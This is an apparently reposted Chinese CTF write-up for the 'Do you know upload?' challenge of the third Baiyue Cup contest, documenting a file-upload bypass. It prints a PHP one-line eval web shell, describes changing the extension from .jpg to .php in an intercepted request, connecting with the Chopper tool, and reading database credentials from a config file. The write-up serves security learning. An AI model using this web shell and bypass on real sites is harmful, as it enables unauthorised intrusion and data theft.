第三届“百越杯”福建省高校网络空间安全大赛-Do you know upload?-WP


上传绕过,菜刀连接数据库

题目描述

第三届“百越杯”福建省高校网络空间安全大赛-Do you know upload?-WP_第1张图片

解题思路

第三届“百越杯”福建省高校网络空间安全大赛-Do you know upload?-WP_第2张图片
写的明明白白,图片上传,用txt写个一句话再把后缀改成jpg即可,一句话:

 @eval($_POST['caidao']);?>

上传,抓包
第三届“百越杯”福建省高校网络空间安全大赛-Do you know upload?-WP_第3张图片
jpg改为php,GOGOGO发包
第三届“百越杯”福建省高校网络空间安全大赛-Do you know upload?-WP_第4张图片
得到上传路径,用菜刀链接
第三届“百越杯”福建省高校网络空间安全大赛-Do you know upload?-WP_第5张图片
进去后发现并没有FLAG,不过有一个配置文件,里面有数据库的账号和密码
第三届“百越杯”福建省高校网络空间安全大赛-Do you know upload?-WP_第6张图片
第三届“百越杯”福建省高校网络空间安全大赛-Do you know upload?-WP_第7张图片
菜刀连接,配置一下

MYSQL
localhost
ctf

ctfctfctf

第三届“百越杯”福建省高校网络空间安全大赛-Do you know upload?-WP_第8张图片
右键数据库管理,拿flag

得到FLAG

直接双击flag没有回显,改一下查询命令即可
第三届“百越杯”福建省高校网络空间安全大赛-Do you know upload?-WP_第9张图片
第三届“百越杯”福建省高校网络空间安全大赛-Do you know upload?-WP_第10张图片
flag{8ec2465a-86fc-4513-8e66-1b8cce1958e0}


END

你可能感兴趣的:(CTF做题记录)